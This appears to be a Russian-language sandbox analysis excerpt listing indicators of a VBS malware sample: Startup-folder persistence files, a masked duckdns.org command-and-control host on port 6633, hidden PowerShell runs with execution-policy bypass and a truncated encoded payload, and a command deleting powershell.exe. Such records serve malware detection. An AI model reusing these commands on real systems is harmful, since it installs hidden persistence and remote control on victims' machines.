Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\nyanxcat.vbs
- %APPDATA%\uwehmxzbdo.vbs
- 'oc#####28.duckdns.org':6633
- DNS ASK oc#####28.duckdns.org
- '<SYSTEM32>\wscript.exe' //B "%APPDATA%\uwEHmXZBdO.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '<PATH_SAMPLE>.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\NYANxCAT.vbs';' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4A...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C Y /N /D Y /T 1 & Del "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '<PATH_SAMPLE>.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\NYANxCAT.vbs';
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4A...
- '<SYSTEM32>\cmd.exe' /C Y /N /D Y /T 1 & Del "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe"